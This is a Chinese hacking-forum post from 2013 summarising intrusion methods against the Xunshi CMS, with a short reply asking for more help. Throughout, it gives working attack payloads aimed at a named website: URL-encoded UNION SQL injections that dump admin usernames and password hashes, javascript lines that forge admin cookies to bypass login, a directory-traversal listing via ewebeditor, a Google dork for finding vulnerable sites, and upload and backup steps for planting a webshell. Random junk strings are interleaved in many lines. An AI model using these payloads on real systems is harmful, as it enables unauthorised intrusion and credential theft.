找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2672|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
by:血封忆尘- g, u5 z+ T- N1 @! j- n' l
+ l0 n" m& O7 N" s* ?
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)6 r/ ]0 t. o; U+ `7 Z2 \2 F
) f$ O8 R; V/ _( ^/ W- {( q
以下本文总结来自黑防去年第9期杂志上的内容...
* ~( c4 k6 l6 J
1 C6 A1 Y2 p2 J; H4 Y  C先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
: y  ?" |' J  t  x# G' `6 e) P1 o! u6 E) I
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 " N4 L* ?; _3 v2 q/ W8 T1 q
& H% l9 i5 e4 ~
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
* O7 W, u7 K& ^, N这里一个注入
- Q# r. @! Y% P/ H  Z2 `+ R  l8 s- `8 ?* D2 n
效果如图:
* P/ k( N# h+ c/ l8 W% S' J4 ]% e# Z. f: d

, {& G$ K( M, d1 `5 X: x% m
. ]$ a' m; \  w1 w, i4 T7 M! |; }; [5 Z这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.0 T* j# i1 e' N$ W. `. W

( T& Q; F, c. B4 w. q2 e密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
. t5 u2 r9 J* W& h0 Q# i( S! I
6 F) N4 U: E# J4 D" zjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
7 ^# w) d# a9 X; B# X* W9 C# P* I0 T) _% U
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
0 s. ~* K( ?0 C/ K8 F9 N6 i& Z  D) U' f5 X. s5 V
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
( p7 }. \3 t# s
# w1 C! A( g$ q9 m它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
: `. C7 a. z9 A- ]0 {
4 q) P+ n, v7 h6 U  B. ]) n访问这页面来列目录..步骤如下:
9 N0 w- f7 N( {+ v+ u. O5 G9 R. ?4 T9 a1 e6 d
javascript:alert(document.cookie="admindj=1") / V; g, N& U$ d" m7 w
2 w+ C' F: u9 j- f
http://www.political-security.co ... asp?id=46&dir=../.., K9 D$ e# r3 u
( E$ {: L0 }; E
效果如图:4 E- L  Z' }( b9 ]" Y
8 Y2 h( E  M! {4 n$ K

2 w8 V3 d: {! J& N+ F# h8 U. Y$ ~+ q# T
这样全站目录都能瞧了..找到后台目录..进去..
) f' U- L  R6 N( {9 c  H8 j2 C; x. I
9 {6 Y, |  b# w那么进了后台怎么拿shell??上传--备份就ok了..
$ J3 Z! n3 d9 b# {% H. B& P5 |8 K4 |! v1 {" C# \, F
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
3 M% u6 }9 K' j: N& n0 S  S" L3 `: ^# e  C  B
这个我也碰到过一次..你都可以通过列目录来实现..7 L; J, {5 n1 j% b+ q
0 |% Z& q- A7 O
javascript:alert(document.cookie="admindj=1") ) l' a& L" x' _% f  e
+ P3 b/ u$ K. c3 F/ B# W: X3 c
http://www.political-security.co ... p?action=BackupData % i. z0 u: \: U/ c& W

% q9 a7 l6 R+ t5 U- K% s备份ok..3 U% o5 d8 H0 _7 C. H- \% f5 @8 l

+ @; O5 g) G  l! H那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
! }( x3 H# T% F+ t5 b7 r7 w! f
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
& L. B) w! H) {6 x; ^/ t4 f
' Q. F! C6 ]) q* K5 ^# c2 E然后访问此页面进行注入..步骤如下:
1 ~/ P. b9 ]/ _! P$ g) ?
& W7 ?+ |; q* Y) h- _- e# \javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
8 e% I* W, O1 J, d0 x5 X: k9 X- \
然后请求admin/admin_chk.asp页面  X, f+ N. v0 `8 b

% b9 |, n: a, M7 @  z, Q$ t输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%8 A) `+ W& V5 f! T3 T( N/ A
' w2 M* I; x9 T9 P+ z/ X( @( ?
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
* {  n. J/ N3 I* R( l
" l# K, M0 Z! j' L% n效果如图所示:2 v6 J0 z% M/ X- _/ c

1 R  |: U' o: v! y, a% X 2 C& K! L4 \" ^  k3 K! J4 U/ L" c
4 S2 B# w% \/ S" n; l8 O$ I
讯时漏洞2
' z" e# u. O% V+ r2 }! Zgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)" Y- y0 a# c6 [

- D& W; Q, Z7 H* Q: P1、/admin/admin_news_pl_view.asp?id=11 @) X( y7 t$ a& _- S$ a* M8 a, T
//id任意 填入以下语句
4 n' i7 B/ D" J5 O: M7 l 4 |2 g5 K; b5 w# v. ?, t
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
! J" ]" A7 v& I, C# o: P) g
9 Z% N( E& D* R# b6 V# O6 i3 N& a1 [9 m% c; }0 j& C1 K" q, @
6 F% U" a$ a# V7 f) _
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='$ Y. r5 h# N. K/ Q$ e

1 @' I4 H) N# X  R# j, k. B
, Q) I6 X" p' `7 _* g; J. J8 F5 T1 Z3 Y4 l
爆出管理员帐号和密码了7 O1 \3 B, m+ z" o
, X! L) r* @, K( t7 j
9 N) O& Z/ n- q7 T) z
/ Z9 Q, u/ P% z2 D) f: b7 l% n
4、cookies进后台2 |$ ?9 a4 M; W" _0 F1 J

: A  g8 W3 l" tjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
% A6 Z) o: M, L6 l+ _7 P, Y8 }; e / r7 e+ Q1 o7 ?& H% A0 @7 ^
) W0 _: ~% m( |: ]8 ~

  N+ C! u8 e1 E. u' |6 ?+ ?: U' c5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
/ H. Q* [' o4 z. O! S% f7 K& F & Q. l7 Q7 ]/ {) |2 W- s- `( ]
" \( Y% [2 \+ N4 J

/ o" O2 i' Z9 e7 }: \6、后台有上传和备份取SHELL不难。
- g8 }/ b9 {+ w ' K9 L% q. r1 M* _) A
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
( I4 @& c0 D+ A' R
) S& b/ n9 L! m3 U逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!+ ~1 U7 k* @( A0 G$ n
% [- p* l- c, J$ X! B

: _2 H5 w: x$ l1 J8 T- t  t$ ]0 u! q/ c. R" o3 }' {. s7 H+ ~/ b. ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表